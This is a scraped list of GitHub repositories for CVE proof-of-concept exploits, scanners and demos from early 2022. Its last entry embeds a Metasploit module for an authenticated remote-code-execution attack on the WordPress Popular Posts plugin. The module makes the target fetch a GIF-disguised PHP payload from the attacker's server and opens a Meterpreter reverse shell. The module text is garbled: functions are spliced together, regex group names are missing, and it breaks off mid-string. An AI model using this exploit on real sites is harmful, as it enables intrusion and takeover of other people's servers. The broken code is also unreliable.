**CVE-2021-46069 - A Stored Cross Site Scripting (XSS) vulnerability exists in Vehicle Service Management System 1.0 via the Mechanic List Section in login panel.** : [plsanu/CVE-2021-46069](https://github.com/plsanu/CVE-2021-46069) create time: 2022-01-14T18:27:00Z

**CVE-2021-46071 - A Stored Cross Site Scripting (XSS) vulnerability exists in Vehicle Service Management System 1.0 via the Category List Section in login panel.** : [plsanu/Vehicle-Service-Management-System-Category-List-Stored-Cross-Site-Scripting-XSS](https://github.com/plsanu/Vehicle-Service-Management-System-Category-List-Stored-Cross-Site-Scripting-XSS) create time: 2021-12-28T14:09:54Z

**CVE-2021-46070 - A Stored Cross Site Scripting (XSS) vulnerability exists in Vehicle Service Management System 1.0 via the Service Requests Section in login panel.** : [plsanu/Vehicle-Service-Management-System-Service-Requests-Stored-Cross-Site-Scripting-XSS](https://github.com/plsanu/Vehicle-Service-Management-System-Service-Requests-Stored-Cross-Site-Scripting-XSS) create time: 2021-12-28T14:00:52Z

**CVE-2021-46069 - A Stored Cross Site Scripting (XSS) vulnerability exists in Vehicle Service Management System 1.0 via the Mechanic List Section in login panel.** : [plsanu/Vehicle-Service-Management-System-Mechanic-List-Stored-Cross-Site-Scripting-XSS](https://github.com/plsanu/Vehicle-Service-Management-System-Mechanic-List-Stored-Cross-Site-Scripting-XSS) create time: 2021-12-28T13:47:59Z

**CVE-2021-46068 - A Stored Cross Site Scripting (XSS) vulnerability exists in Vehicle Service Management System 1.0 via the My Account Section in login panel.** : [plsanu/Vehicle-Service-Management-System-MyAccount-Stored-Cross-Site-Scripting-XSS](https://github.com/plsanu/Vehicle-Service-Management-System-MyAccount-Stored-Cross-Site-Scripting-XSS) create time: 2021-12-27T22:07:08Z

**CVE-2021-46067 - In Vehicle Service Management System 1.0 an attacker can steal the cookies leading to Full Account Takeover.** : [plsanu/Vehicle-Service-Management-System-Multiple-Cookie-Stealing-Leads-to-Full-Account-Takeover](https://github.com/plsanu/Vehicle-Service-Management-System-Multiple-Cookie-Stealing-Leads-to-Full-Account-Takeover) create time: 2021-12-27T21:15:41Z

**CVE-2021-45745 - A Stored Cross Site Scripting (XSS) vulnerability exists in Bludit 3.13.1 via the About Plugin in login panel. Application stores attacker injected dangerous JavaScript in to the database and executes without validating.** : [plsanu/Bludit-3.13.1-About-Plugin-Stored-Cross-Site-Scripting-XSS](https://github.com/plsanu/Bludit-3.13.1-About-Plugin-Stored-Cross-Site-Scripting-XSS) create time: 2021-12-19T17:54:55Z

**CVE-2021-45744 - A Stored Cross Site Scripting (XSS) vulnerability exists in bludit 3.13.1 via the TAGS section in login panel. Application stores attacker injected dangerous JavaScript in to the database and executes without validating.** : [plsanu/Bludit-3.13.1-TAGS-Field-Stored-Cross-Site-Scripting-XSS](https://github.com/plsanu/Bludit-3.13.1-TAGS-Field-Stored-Cross-Site-Scripting-XSS) create time: 2021-12-19T17:50:15Z

**CVE-2021-46068** : [plsanu/CVE-2021-46068](https://github.com/plsanu/CVE-2021-46068) create time: 2022-01-14T18:04:01Z

**CVE-2021-46067** : [plsanu/CVE-2021-46067](https://github.com/plsanu/CVE-2021-46067) create time: 2022-01-14T17:19:09Z

**CVE-2021-45745** : [plsanu/CVE-2021-45745](https://github.com/plsanu/CVE-2021-45745) create time: 2022-01-14T16:52:08Z

**This Pwsh script run AppScan Standard scans against a list of web sites (URLs.txt) checking for Log4J (CVE-2021-44228) vulnerability** : [jrocia/Search-log4Jvuln-AppScanSTD](https://github.com/jrocia/Search-log4Jvuln-AppScanSTD) create time: 2022-01-14T16:47:20Z

**Proof Of Concept code for OctoberCMS Auth Bypass CVE-2021-32648** : [Immersive-Labs-Sec/CVE-2021-32648](https://github.com/Immersive-Labs-Sec/CVE-2021-32648) create time: 2022-01-14T15:50:11Z

**CVE-2021-45744** : [plsanu/CVE-2021-45744](https://github.com/plsanu/CVE-2021-45744) create time: 2022-01-14T15:36:21Z

**no description** : [puckiestyle/CVE-2018-16341](https://github.com/puckiestyle/CVE-2018-16341) create time: 2022-01-14T13:38:04Z

**For code auit and CVE-2020-21378 repetition** : [sukusec301/SeaCMS-v10.1-](https://github.com/sukusec301/SeaCMS-v10.1-) create time: 2022-01-14T11:17:26Z

**no description** : [BishopFox/CVE-2021-35211](https://github.com/BishopFox/CVE-2021-35211) create time: 2022-01-14T05:52:17Z

**JWT Key Confusion PoC (CVE-2015-9235) Written for the Hack the Box challenge - Under Construction** : [aalex954/jwt-key-confusion-poc](https://github.com/aalex954/jwt-key-confusion-poc) create time: 2022-01-13T23:09:13Z

**This work includes testing and improvement tools for CVE-2021-44228(log4j).** : [sdogancesur/log4j_github_repository](https://github.com/sdogancesur/log4j_github_repository) create time: 2022-01-13T21:16:26Z

**CVE-2021-44228** : [eliadbz/log4shell](https://github.com/eliadbz/log4shell) create time: 2022-01-13T20:26:24Z

**CVE-2021-38141 in OpenEMPI 4.04** : [connellmcg/CVE-2021-38141](https://github.com/connellmcg/CVE-2021-38141) create time: 2022-01-13T16:19:45Z

**no description** : [solitarysp/Log4j-CVE-2021-44228](https://github.com/solitarysp/Log4j-CVE-2021-44228) create time: 2022-01-13T13:46:12Z

**Script - Workaround instructions to address CVE-2021-44228 in vCenter Server** : [Fazmin/vCenter-Server-Workaround-Script-CVE-2021-44228](https://github.com/Fazmin/vCenter-Server-Workaround-Script-CVE-2021-44228) create time: 2021-12-17T05:14:05Z

**POC of CVE-2021-26084, which is Atlassian Confluence Server OGNL(Object-Graph Navigation Language) Injection Vulneralibity.** : [antx-code/CVE-2021-26084](https://github.com/antx-code/CVE-2021-26084) create time: 2022-01-13T06:29:51Z

**A potential Denial of Service issue in protobuf-java high severity GitHub Reviewed Published 5 days ago in protocolbuffers/protobuf • Updated yesterday Vulnerability details Dependabot alerts 2 Package com.google.protobuf:protobuf-java (maven) Affected versions < 3.16.1 >= 3.18.0, < 3.18.2 >= 3.19.0, < 3.19.2 Patched versions 3.16.1 3.18.2 3.19.2 Package com.google.protobuf:protobuf-kotlin (maven) Affected versions >= 3.18.0, < 3.18.2 >= 3.19.0, < 3.19.2 Patched versions 3.18.2 3.19.2 Package google-protobuf (RubyGems) Affected versions < 3.19.2 Patched versions 3.19.2 Description Summary A potential Denial of Service issue in protobuf-java was discovered in the parsing procedure for binary data. Reporter: OSS-Fuzz Affected versions: All versions of Java Protobufs (including Kotlin and JRuby) prior to the versions listed below. Protobuf "javalite" users (typically Android) are not affected. Severity CVE-2021-22569 High - CVSS Score: 7.5, An implementation weakness in how unknown fields are parsed in Java. A small (~800 KB) malicious payload can occupy the parser for several minutes by creating large numbers of short-lived objects that cause frequent, repeated GC pauses. Proof of Concept For reproduction details, please refer to the oss-fuzz issue that identifies the specific inputs that exercise this parsing weakness. Remediation and Mitigation Please update to the latest available versions of the following packages: protobuf-java (3.16.1, 3.18.2, 3.19.2) protobuf-kotlin (3.18.2, 3.19.2) google-protobuf [JRuby gem only] (3.19.2) References GHSA-wrvw-hg22-4m67 https://nvd.nist.gov/vuln/detail/CVE-2021-22569 https://bugs.chromium.org/p/oss-fuzz/issues/detail?id=39330 https://cloud.google.com/support/bulletins#gcp-2022-001** : [Mario-Kart-Felix/A-potential-Denial-of-Service-issue-in-protobuf-java](https://github.com/Mario-Kart-Felix/A-potential-Denial-of-Service-issue-in-protobuf-java) create time: 2022-01-13T03:33:54Z

**Explanation of CVE-2021-45046 for classroom use** : [taise-hub/log4j-poc](https://github.com/taise-hub/log4j-poc) create time: 2022-01-13T03:02:47Z

**This repository was created with the purpose to make it easy for organizations and individuals to study and research log4jshell vulnerability code name CVE-2021-44228.** : [adamtheapiguy/log4jshellPoC](https://github.com/adamtheapiguy/log4jshellPoC) create time: 2022-01-13T01:53:17Z

**no description** : [artsking/linux-4.19.72_CVE-2020-14386](https://github.com/artsking/linux-4.19.72_CVE-2020-14386) create time: 2022-01-13T02:05:23Z

**Démo du fonctionnement de log4shell (CVE-2021-44228)** : [jxerome/log4shell](https://github.com/jxerome/log4shell) create time: 2022-01-12T23:44:20Z

**School project - Please use other repos for actual testing** : [norrig/CVE-2021-41773-exploiter](https://github.com/norrig/CVE-2021-41773-exploiter) create time: 2022-01-12T17:42:36Z

**no description** : [SABI-Ensimag/CVE-2019-18276](https://github.com/SABI-Ensimag/CVE-2019-18276) create time: 2022-01-12T11:40:57Z

**CVE-2021-32099** : [ibnuuby/CVE-2021-32099](https://github.com/ibnuuby/CVE-2021-32099) create time: 2022-01-12T11:48:34Z

**no description** : [artsking/linux-4.19.72_CVE-2020-14386](https://github.com/artsking/linux-4.19.72_CVE-2020-14386) create time: 2022-01-12T10:41:44Z

**CVE-2020-15261 test** : [yaoyao-cool/CVE-2020-15261](https://github.com/yaoyao-cool/CVE-2020-15261) create time: 2022-01-12T10:00:39Z

**no description** : [aazhuliang/CVE-2021-31956-EXP](https://github.com/aazhuliang/CVE-2021-31956-EXP) create time: 2022-01-11T16:03:38Z

**cups-root-file-read.sh | CVE-2012-5519** : [0zvxr/CVE-2012-5519](https://github.com/0zvxr/CVE-2012-5519) create time: 2022-01-07T15:39:47Z

**Powershell implemetation of CVE-2020-7352** : [szerszen199/PS-CVE-2020-7352](https://github.com/szerszen199/PS-CVE-2020-7352) create time: 2022-01-05T00:11:58Z

**Just for HTB** : [zjicmDarkWing/CVE-2021-32099](https://github.com/zjicmDarkWing/CVE-2021-32099) create time: 2022-01-11T08:14:06Z

**Experimental exploit for Log4Shell** : [c4dr01d/CVE-2021-44228](https://github.com/c4dr01d/CVE-2021-44228) create time: 2022-01-10T04:55:23Z

**a cve crawler for 2021** : [song856854132/scrapy_CVE2021](https://github.com/song856854132/scrapy_CVE2021) create time: 2022-01-09T15:39:53Z

**no description** : [Nivaskumark/CVE-2021-40490_kernel_v4.19.72](https://github.com/Nivaskumark/CVE-2021-40490_kernel_v4.19.72) create time: 2022-01-11T05:42:58Z

**no description** : [Nivaskumark/CVE-2021-0434_packages_apps_Settings](https://github.com/Nivaskumark/CVE-2021-0434_packages_apps_Settings) create time: 2022-01-11T05:14:06Z

**no description** : [Nivaskumark/CVE-2021-0434_packages_apps_Settings_beforefix](https://github.com/Nivaskumark/CVE-2021-0434_packages_apps_Settings_beforefix) create time: 2022-01-11T04:51:23Z

**Log4j version 1.2.17 without the offending class responsible for CVE-2021-4104.** : [open-AIMS/log4j](https://github.com/open-AIMS/log4j) create time: 2022-01-10T09:01:46Z

**CVE-2021-44228** : [mr-vill4in/log4j-fuzzer](https://github.com/mr-vill4in/log4j-fuzzer) create time: 2022-01-08T00:28:32Z

**An exploit for CVE-2021-20038** : [jbaines-r7/badblood](https://github.com/jbaines-r7/badblood) create time: 2022-01-11T02:25:25Z

**no description** : [marcinguy/CVE-2021-39623](https://github.com/marcinguy/CVE-2021-39623) create time: 2022-01-10T19:25:28Z

**no description** : [Veids/CVE-2020-3452_auto](https://github.com/Veids/CVE-2020-3452_auto) create time: 2022-01-10T16:56:40Z

**CVE-2022-21660** : [UzJu/Gin-Vue-admin-poc-CVE-2022-21660](https://github.com/UzJu/Gin-Vue-admin-poc-CVE-2022-21660) create time: 2022-01-10T05:50:35Z

**CVE-2021-41277 can be extended to an SSRF** : [sasukeourad/CVE-2021-41277_SSRF](https://github.com/sasukeourad/CVE-2021-41277_SSRF) create time: 2022-01-10T01:52:10Z

**no description** : [cryptoforcecommand/log4j-cve-2021-44228](https://github.com/cryptoforcecommand/log4j-cve-2021-44228) create time: 2022-01-09T08:22:24Z

**no description** : [gnaiq/cve-2022-2222](https://github.com/gnaiq/cve-2022-2222) create time: 2022-01-10T02:23:06Z

**no description** : [cybersecurityworks553/CVE-2021-42392-Detect](https://github.com/cybersecurityworks553/CVE-2021-42392-Detect) create time: 2022-01-09T16:23:16Z

**This Log4j RCE exploit originated from https://github.com/tangxiaofeng7/CVE-2021-44228-Apache-Log4j-Rce** : [maximofernandezriera/CVE-2021-44228](https://github.com/maximofernandezriera/CVE-2021-44228) create time: 2022-01-09T13:38:38Z

**no description** : [MichaelsPlayground/CVE-2019-9465](https://github.com/MichaelsPlayground/CVE-2019-9465) create time: 2022-01-08T22:25:43Z

**2022年Java应用程序的CVE漏洞** : [HackJava/CVE2022](https://github.com/HackJava/CVE2022) create time: 2022-01-08T15:28:02Z

**no description** : [alexpena5635/CVE-2021-44228_scanner-main-Modified-](https://github.com/alexpena5635/CVE-2021-44228_scanner-main-Modified-) create time: 2022-01-05T00:14:08Z

**一键批量检测poc** : [yggcwhat/CVE-2021-45232](https://github.com/yggcwhat/CVE-2021-45232) create time: 2022-01-08T08:16:06Z

**CVE-2021-45232批量一键检测** : [yggcwhat/Demo](https://github.com/yggcwhat/Demo) create time: 2022-01-08T07:42:43Z

**CVE-2021-44270** : [pinpinsec/Anviz-Access-Control-Authentication-Bypass](https://github.com/pinpinsec/Anviz-Access-Control-Authentication-Bypass) create time: 2021-11-23T15:04:23Z

**no description** : [1nf1n17yk1ng/CVE-2018-16763](https://github.com/1nf1n17yk1ng/CVE-2018-16763) create time: 2022-01-08T07:15:24Z

**A vulnerable Java based REST API for demonstrating CVE-2021-44228 (log4shell).** : [nix-xin/vuln4japi](https://github.com/nix-xin/vuln4japi) create time: 2022-01-08T06:45:44Z

**no description** : [rodpwn/CVE-2021-43798-mass_scanner](https://github.com/rodpwn/CVE-2021-43798-mass_scanner) create time: 2022-01-08T02:58:18Z

**Exploiting CVE-2021-44228 in VMWare Horizon for remote code execution and more.** : [puzzlepeaches/Log4jHorizon](https://github.com/puzzlepeaches/Log4jHorizon) create time: 2022-01-05T22:25:42Z

**Log4jshell - CVE-2021-44228** : [Vulnmachines/log4jshell_CVE-2021-44228](https://github.com/Vulnmachines/log4jshell_CVE-2021-44228) create time: 2022-01-07T09:56:30Z

**CVE-2021-42013-exp** : [rnsss/CVE-2021-42013](https://github.com/rnsss/CVE-2021-42013) create time: 2022-01-07T03:12:45Z

**no description** : [Yuji-Kakeya/log4j-CVE-2021-45046-poc](https://github.com/Yuji-Kakeya/log4j-CVE-2021-45046-poc) create time: 2022-01-05T04:13:59Z

**Exploiting: CVE-2021-41349** : [exploit-io/CVE-2021-41349](https://github.com/exploit-io/CVE-2021-41349) create time: 2022-01-06T09:44:15Z

**Grafana8.x 任意文件读取** : [rnsss/CVE-2021-43798-poc](https://github.com/rnsss/CVE-2021-43798-poc) create time: 2022-01-06T09:25:35Z

**no description** : [lsw29475/CVE-2021-39863](https://github.com/lsw29475/CVE-2021-39863) create time: 2021-12-12T13:27:16Z

**no description** : [gnaiq/cve2022123](https://github.com/gnaiq/cve2022123) create time: 2022-01-06T07:58:57Z

**no description** : [gnaiq/cve-2022-4444](https://github.com/gnaiq/cve-2022-4444) create time: 2022-01-06T07:22:47Z

**no description** : [Xifeng2009/go_get_cve_2018_6574](https://github.com/Xifeng2009/go_get_cve_2018_6574) create time: 2022-01-06T02:56:07Z

**运用golang写的grafana批量验证脚本,内置48个poc** : [light-Life/CVE-2021-43798](https://github.com/light-Life/CVE-2021-43798) create time: 2022-01-06T01:54:26Z

**no description** : [timb-machine-mirrors/CVE-2021-28482](https://github.com/timb-machine-mirrors/CVE-2021-28482) create time: 2022-01-05T23:26:58Z

**no description** : [timb-machine-mirrors/CVE-2021-22005](https://github.com/timb-machine-mirrors/CVE-2021-22005) create time: 2022-01-05T23:22:08Z

**no description** : [timb-machine-mirrors/CVE-2021-42321_poc](https://github.com/timb-machine-mirrors/CVE-2021-42321_poc) create time: 2022-01-05T23:15:55Z

**Directory of all CVEs from 2019 to 2021.** : [reconmap/vulnerability-data](https://github.com/reconmap/vulnerability-data) create time: 2020-09-25T18:29:45Z

**latest developments and resources on log4j vulnerability CVE-2021-44228** : [cryptoforcecommand/log4j-CVE-2021-44228](https://github.com/cryptoforcecommand/log4j-CVE-2021-44228) create time: 2022-01-05T21:00:44Z

**Log4j2 LDAP 취약점 테스트 (CVE-2021-44228)** : [mklinkj/log4j2-test](https://github.com/mklinkj/log4j2-test) create time: 2022-01-03T04:36:41Z

**A simple program to demonstrate how Log4j vulnerability can be exploited ( CVE-2021-44228 )** : [ChandanShastri/Log4j_Vulnerability_Demo](https://github.com/ChandanShastri/Log4j_Vulnerability_Demo) create time: 2022-01-05T15:24:20Z

**Details,PoC and patches for CVE-2021-45383 & CVE-2021-45384** : [nt1dr/CVE-2021-45383](https://github.com/nt1dr/CVE-2021-45383) create time: 2022-01-05T12:56:23Z

**Backdoor detection for VMware view** : [mr-r3b00t/CVE-2021-44228](https://github.com/mr-r3b00t/CVE-2021-44228) create time: 2022-01-05T11:27:16Z

**Config files for my GitHub profile.** : [cvelez2002/cvelez2002](https://github.com/cvelez2002/cvelez2002) create time: 2022-01-05T08:33:27Z

**no description** : [Kuibagit/CVE-2021-45232-RCE](https://github.com/Kuibagit/CVE-2021-45232-RCE) create time: 2022-01-05T09:07:35Z

**A vulnerable web app for log4j2 RCE(CVE-2021-44228) exploit test.** : [kanitan/log4j2-web-vulnerable](https://github.com/kanitan/log4j2-web-vulnerable) create time: 2022-01-05T08:13:32Z

**no description** : [gnaiq/CVE-2022-1234](https://github.com/gnaiq/CVE-2022-1234) create time: 2022-01-05T07:07:41Z

**CVE-2021-45232-RCE-多线程批量漏洞检测** : [GYLQ/CVE-2021-45232-RCE](https://github.com/GYLQ/CVE-2021-45232-RCE) create time: 2022-01-05T04:13:10Z

**PoC for CVE-2019-5736** : [Frichetten/CVE-2019-5736-PoC](https://github.com/Frichetten/CVE-2019-5736-PoC) create time: 2019-02-13T05:26:32Z

**Searchable page for CISA Log4j (CVE-2021-44228) Affected Vendor & Software List** : [4jfinder/4jfinder.github.io](https://github.com/4jfinder/4jfinder.github.io) create time: 2022-01-04T03:37:03Z

**CVE-2021-42342 RCE** : [Mr-xn/CVE-2021-42342](https://github.com/Mr-xn/CVE-2021-42342) create time: 2022-01-04T14:48:59Z

**no description** : [w1023913214/CVE-2022](https://github.com/w1023913214/CVE-2022) create time: 2022-01-04T13:51:54Z

**the name of virus is the detection of microsoft defender, is the tipic antivirus** : [Malware-S/Exploit-Win32.CVE-2017-0147.A](https://github.com/Malware-S/Exploit-Win32.CVE-2017-0147.A) create time: 2022-01-04T10:25:39Z

**PoC Site for tsunami-security-scanner-plugins.** : [PfalzPrince/CVE-2021-28750](https://github.com/PfalzPrince/CVE-2021-28750) create time: 2022-01-04T08:05:03Z

**POC for CVE-2021-22214: Gitlab SSRF** : [kh4sh3i/GitLab-SSRF-CVE-2021-22214](https://github.com/kh4sh3i/GitLab-SSRF-CVE-2021-22214) create time: 2022-01-04T05:52:57Z

**Atmail XSS-RCE-CSRF Exploit Chain** : [AndrewTrube/CVE-2012-2593](https://github.com/AndrewTrube/CVE-2012-2593) create time: 2022-01-04T02:47:46Z

**Bassmaster Plugin NodeJS RCE** : [AndrewTrube/CVE-2014-7205](https://github.com/AndrewTrube/CVE-2014-7205) create time: 2022-01-04T02:59:32Z

**the name of virus is the detection of microsoft defender, is the tipic antivirus** : [Malware-S/Exploit-Win32.CVE-2012-0158.F.doc](https://github.com/Malware-S/Exploit-Win32.CVE-2012-0158.F.doc) create time: 2022-01-03T21:13:13Z

**Gerapy prior to version 0.9.8 is vulnerable to remote code execution. This issue is patched in version 0.9.8.** : [LongWayHomie/CVE-2021-43857](https://github.com/LongWayHomie/CVE-2021-43857) create time: 2022-01-03T16:47:42Z

**no description** : [khuntor/cve-2021-43858](https://github.com/khuntor/cve-2021-43858) create time: 2022-01-03T14:12:35Z

**A sample POC to test CVE-2021-30853** : [shubham0d/CVE-2021-30853](https://github.com/shubham0d/CVE-2021-30853) create time: 2022-01-02T20:24:11Z

**no description** : [thl-cmk/CVE-2021-44228-log4j-check_mk-plugin](https://github.com/thl-cmk/CVE-2021-44228-log4j-check_mk-plugin) create time: 2021-12-19T10:46:53Z

**CVE-2016-10555 PoC code** : [scent2d/PoC-CVE-2016-10555](https://github.com/scent2d/PoC-CVE-2016-10555) create time: 2022-01-02T15:02:59Z

**### This module requires Metasploit: https://metasploit.com/download# Current source: https://github.com/rapid7/metasploit-framework##class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking prepend Msf::Exploit::Remote::AutoCheck include Msf::Exploit::FileDropper include Msf::Exploit::Remote::HttpClient include Msf::Exploit::Remote::HttpServer include Msf::Exploit::Remote::HTTP::Wordpress def initialize(info = {}) super( update_info( info, 'Name' => 'Wordpress Popular Posts Authenticated RCE', 'Description' => %q{ This exploit requires Metasploit to have a FQDN and the ability to run a payload web server on port 80, 443, or 8080. The FQDN must also not resolve to a reserved address (192/172/127/10). The server must also respond to a HEAD request for the payload, prior to getting a GET request. This exploit leverages an authenticated improper input validation in Wordpress plugin Popular Posts <= 5.3.2. The exploit chain is rather complicated. Authentication is required and 'gd' for PHP is required on the server. Then the Popular Post plugin is reconfigured to allow for an arbitrary URL for the post image in the widget. A post is made, then requests are sent to the post to make it more popular than the previous #1 by 5. Once the post hits the top 5, and after a 60sec (we wait 90) server cache refresh, the homepage widget is loaded which triggers the plugin to download the payload from our server. Our payload has a 'GIF' header, and a double extension ('.gif.php') allowing for arbitrary PHP code to be executed. }, 'License' => MSF_LICENSE, 'Author' => [ 'h00die', # msf module 'Simone Cristofaro', # edb 'Jerome Bruandet' # original analysis ], 'References' => [ [ 'EDB', '50129' ], [ 'URL', 'https://blog.nintechnet.com/improper-input-validation-fixed-in-wordpress-popular-posts-plugin/' ], [ 'WPVDB', 'bd4f157c-a3d7-4535-a587-0102ba4e3009' ], [ 'URL', 'https://plugins.trac.wordpress.org/changeset/2542638' ], [ 'URL', 'https://github.com/cabrerahector/wordpress-popular-posts/commit/d9b274cf6812eb446e4103cb18f69897ec6fe601' ], [ 'CVE', '2021-42362' ] ], 'Platform' => ['php'], 'Stance' => Msf::Exploit::Stance::Aggressive, 'Privileged' => false, 'Arch' => ARCH_PHP, 'Targets' => [ [ 'Automatic Target', {}] ], 'DisclosureDate' => '2021-06-11', 'DefaultTarget' => 0, 'DefaultOptions' => { 'PAYLOAD' => 'php/meterpreter/reverse_tcp', 'WfsDelay' => 3000 # 50 minutes, other visitors to the site may trigger }, 'Notes' => { 'Stability' => [ CRASH_SAFE ], 'SideEffects' => [ ARTIFACTS_ON_DISK, IOC_IN_LOGS, CONFIG_CHANGES ], 'Reliability' => [ REPEATABLE_SESSION ] } ) ) register_options [ OptString.new('USERNAME', [true, 'Username of the account', 'admin']), OptString.new('PASSWORD', [true, 'Password of the account', 'admin']), OptString.new('TARGETURI', [true, 'The base path of the Wordpress server', '/']), # https://github.com/WordPress/wordpress-develop/blob/5.8/src/wp-includes/http.php#L560 OptString.new('SRVHOSTNAME', [true, 'FQDN of the metasploit server. Must not resolve to a reserved address (192/10/127/172)', '']), # https://github.com/WordPress/wordpress-develop/blob/5.8/src/wp-includes/http.php#L584 OptEnum.new('SRVPORT', [true, 'The local port to listen on.', 'login', ['80', '443', '8080']]), ] end def check return CheckCode::Safe('Wordpress not detected.') unless wordpress_and_online? checkcode = check_plugin_version_from_readme('wordpress-popular-posts', '5.3.3') if checkcode == CheckCode::Safe print_error('Popular Posts not a vulnerable version') end return checkcode end def trigger_payload(on_disk_payload_name) res = send_request_cgi( 'uri' => normalize_uri(target_uri.path), 'keep_cookies' => 'true' ) # loop this 5 times just incase there is a time delay in writing the file by the server (1..5).each do |i| print_status("Triggering shell at: #{normalize_uri(target_uri.path, 'wp-content', 'uploads', 'wordpress-popular-posts', on_disk_payload_name)} in 10 seconds. Attempt #{i} of 5") Rex.sleep(10) res = send_request_cgi( 'uri' => normalize_uri(target_uri.path, 'wp-content', 'uploads', 'wordpress-popular-posts', on_disk_payload_name), 'keep_cookies' => 'true' ) end if res && res.code == 404 print_error('Failed to find payload, may not have uploaded correctly.') end end def on_request_uri(cli, request, payload_name, post_id) if request.method == 'HEAD' print_good('Responding to initial HEAD request (passed check 1)') # according to https://stackoverflow.com/questions/3854842/content-length-header-with-head-requests we should have a valid Content-Length # however that seems to be calculated dynamically, as it is overwritten to 0 on this response. leaving here as notes. # also didn't want to send the true payload in the body to make the size correct as that gives a higher chance of us getting caught return send_response(cli, '', { 'Content-Type' => 'image/gif', 'Content-Length' => "GIF#{payload.encoded}".length.to_s }) end if request.method == 'GET' on_disk_payload_name = "#{post_id}_#{payload_name}" register_file_for_cleanup(on_disk_payload_name) print_good('Responding to GET request (passed check 2)') send_response(cli, "GIF#{payload.encoded}", 'Content-Type' => 'image/gif') close_client(cli) # for some odd reason we need to close the connection manually for PHP/WP to finish its functions Rex.sleep(2) # wait for WP to finish all the checks it needs trigger_payload(on_disk_payload_name) end print_status("Received unexpected #{request.method} request") end def check_gd_installed(cookie) vprint_status('Checking if gd is installed') res = send_request_cgi( 'uri' => normalize_uri(target_uri.path, 'wp-admin', 'options-general.php'), 'method' => 'GET', 'cookie' => cookie, 'keep_cookies' => 'true', 'vars_get' => { 'page' => 'wordpress-popular-posts', 'tab' => 'debug' } ) fail_with(Failure::Unreachable, 'Site not responding') unless res fail_with(Failure::UnexpectedReply, 'Failed to retrieve page') unless res.code == 200 res.body.include? ' gd' end def get_wpp_admin_token(cookie) vprint_status('Retrieving wpp_admin token') res = send_request_cgi( 'uri' => normalize_uri(target_uri.path, 'wp-admin', 'options-general.php'), 'method' => 'GET', 'cookie' => cookie, 'keep_cookies' => 'true', 'vars_get' => { 'page' => 'wordpress-popular-posts', 'tab' => 'tools' } ) fail_with(Failure::Unreachable, 'Site not responding') unless res fail_with(Failure::UnexpectedReply, 'Failed to retrieve page') unless res.code == 200 / normalize_uri(target_uri.path, 'wp-admin', 'options-general.php'), 'method' => 'POST', 'cookie' => cookie, 'keep_cookies' => 'true', 'vars_get' => { 'page' => 'wordpress-popular-posts', 'tab' => 'debug' }, 'vars_post' => { 'upload_thumb_src' => '', 'thumb_source' => 'custom_field', 'thumb_lazy_load' => 0, 'thumb_field' => 'wpp_thumbnail', 'thumb_field_resize' => 1, 'section' => 'thumb', 'wpp-admin-token' => token } ) fail_with(Failure::Unreachable, 'Site not responding') unless res fail_with(Failure::UnexpectedReply, 'Failed to retrieve page') unless res.code == 200 fail_with(Failure::UnexpectedReply, 'Unable to save/change settings') unless /Settings saved/ =~ res.body end def clear_cache(cookie, token) vprint_status('Clearing image cache') res = send_request_cgi( 'uri' => normalize_uri(target_uri.path, 'wp-admin', 'options-general.php'), 'method' => 'POST', 'cookie' => cookie, 'keep_cookies' => 'true', 'vars_get' => { 'page' => 'wordpress-popular-posts', 'tab' => 'debug' }, 'vars_post' => { 'action' => 'wpp_clear_thumbnail', 'wpp-admin-token' => token } ) fail_with(Failure::Unreachable, 'Site not responding') unless res fail_with(Failure::UnexpectedReply, 'Failed to retrieve page') unless res.code == 200 end def enable_custom_fields(cookie, custom_nonce, post) # this should enable the ajax_nonce, it will 302 us back to the referer page as well so we can get it. res = send_request_cgi!( 'uri' => normalize_uri(target_uri.path, 'wp-admin', 'post.php'), 'cookie' => cookie, 'keep_cookies' => 'true', 'method' => 'POST', 'vars_post' => { 'toggle-custom-fields-nonce' => custom_nonce, '_wp_http_referer' => "#{normalize_uri(target_uri.path, 'wp-admin', 'post.php')}?post=#{post}&action=edit", 'action' => 'toggle-custom-fields' } ) /name="_ajax_nonce-add-meta" value="([^"]*)/ =~ res.body Regexp.last_match(1) end def create_post(cookie) vprint_status('Creating new post') # get post ID and nonces res = send_request_cgi( 'uri' => normalize_uri(target_uri.path, 'wp-admin', 'post-new.php'), 'cookie' => cookie, 'keep_cookies' => 'true' ) fail_with(Failure::Unreachable, 'Site not responding') unless res fail_with(Failure::UnexpectedReply, 'Failed to retrieve page') unless res.code == 200 /name="_ajax_nonce-add-meta" value="(?[^"]*)/ =~ res.body /wp.apiFetch.nonceMiddleware = wp.apiFetch.createNonceMiddleware\( "(?[^"]*)/ =~ res.body /},"post":{"id":(?\d*)/ =~ res.body if ajax_nonce.nil? print_error('missing ajax nonce field, attempting to re-enable. if this fails, you may need to change the interface to enable this. See https://www.hostpapa.com/knowledgebase/add-custom-meta-boxes-wordpress-posts/. Or check (while writing a post) Options > Preferences > Panels > Additional > Custom Fields.') /name="toggle-custom-fields-nonce" value="(?[^"]*)/ =~ res.body ajax_nonce = enable_custom_fields(cookie, custom_nonce, post_id) end unless ajax_nonce.nil? vprint_status("ajax nonce: #{ajax_nonce}") end unless wp_nonce.nil? vprint_status("wp nonce: #{wp_nonce}") end unless post_id.nil? vprint_status("Created Post: #{post_id}") end fail_with(Failure::UnexpectedReply, 'Unable to retrieve nonces and/or new post id') unless ajax_nonce && wp_nonce && post_id # publish new post vprint_status("Writing content to Post: #{post_id}") # this is very different from the EDB POC, I kept getting 200 to the home page with their example, so this is based off what the UI submits res = send_request_cgi( 'uri' => normalize_uri(target_uri.path, 'index.php'), 'method' => 'POST', 'cookie' => cookie, 'keep_cookies' => 'true', 'ctype' => 'application/json', 'accept' => 'application/json', 'vars_get' => { '_locale' => 'user', 'rest_route' => normalize_uri(target_uri.path, 'wp', 'v2', 'posts', post_id) }, 'data' => { 'id' => post_id, 'title' => Rex::Text.rand_text_alphanumeric(20..30), 'content' => "\n

#{Rex::Text.rand_text_alphanumeric(100..200)}

